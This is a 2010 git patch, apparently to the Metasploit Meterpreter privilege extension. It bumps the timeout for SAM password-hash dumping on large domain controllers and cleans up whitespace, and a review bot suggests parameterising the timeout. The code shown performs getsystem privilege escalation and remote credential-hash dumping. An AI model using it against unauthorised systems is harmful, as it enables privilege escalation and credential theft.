From 87379e798a04027c245b04cd1fa4288515b8e556 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Tue, 1 Jun 2010 16:45:34 +0000
Subject: [PATCH] Bump the timeout for hashdump, handle large DCs better, thanks Chris!
git-svn-id: file:///home/svn/framework3/trunk@9385 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../post/meterpreter/extensions/priv/priv.rb | 37 ++++++++++---------
 1 file changed, 19 insertions(+), 18 deletions(-)
diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb
index ed1d5e7393..4c4c9e3a00 100644
--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -24,10 +24,10 @@ class Priv < Extension
 #
 def initialize(client)
 super(client, 'priv')
-
+
 client.register_extension_aliases(
 [
- {
+ {
 'name' => 'priv',
 'ext' => self
 },
@@ -36,25 +36,25 @@ class Priv < Extension
 # Initialize sub-classes
 self.fs = Fs.new(client)
 end
-
+
 #
 # Attempt to elevate the meterpreter to Local SYSTEM
 #
 def getsystem( technique=0 )
 request = Packet.create_request( 'priv_elevate_getsystem' )
-
- elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
-
+
+ elevator_name = Rex::Text.rand_text_alpha_lower( 6 )
+
 if( client.platform == 'x64/win64' )
 elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
 else
 elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
 end
-
+
 elevator_path = ::File.expand_path( elevator_path )
-
+
 elevator_data = ""
-
+
 ::File.open( elevator_path, "rb" ) { |f| elevator_data += f.read( f.stat.size ) }
@@ -63,29 +63,29 @@ class Priv < Extension
 request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name )
 request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data )
 request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length )
-
+
 # as some service routines can be slow we bump up the timeout to 90 seconds
 response = client.send_request( request, 90 )
-
+
 technique = response.get_tlv_value( TLV_TYPE_ELEVATE_TECHNIQUE )
-
+
 if( response.result == 0 and technique != nil )
 client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
 client.sys.config.getprivs
 return [ true, technique ]
 end
-
+
 return [ false, 0 ]
 end
-
+
 #
 # Returns an array of SAM hashes from the remote machine.
 #
 def sam_hashes
- response = client.send_request(
- Packet.create_request('priv_passwd_get_sam_hashes'))
+ # This can take a long long time for large domain controls, bump the timeout to one hour
+ response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), 3600)
- response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
+ response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|
 SamUser.new(hash)
 }
 end
@@ -101,4 +101,5 @@ protected
 end
-end; end; end; end; end
\ No newline at end of file
+end; end; end; end; end
+
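Review bot: The one-hour timeout in sam_hashes is a bare literal handed to send_request, so a caller cannot shorten it and a target that never answers blocks the caller for the full 3600 seconds. Taking it as a defaulted parameter keeps the new behaviour while letting callers tune it: `def sam_hashes(timeout = 3600)` and `response = client.send_request(Packet.create_request('priv_passwd_get_sam_hashes'), timeout)`. The added comment also has a typo ("domain controls"); `# Dumping the SAM can take a very long time on large domain controllers, so allow up to one hour` reads better. Separately, the re-added line still chains `.split` straight onto `response.get_tlv_value(TLV_TYPE_SAM_HASHES)`, which raises NoMethodError on nil if the TLV is absent from the reply, so a nil guard before the split is worth adding unless send_request already raises on a failed request (not visible in this hunk).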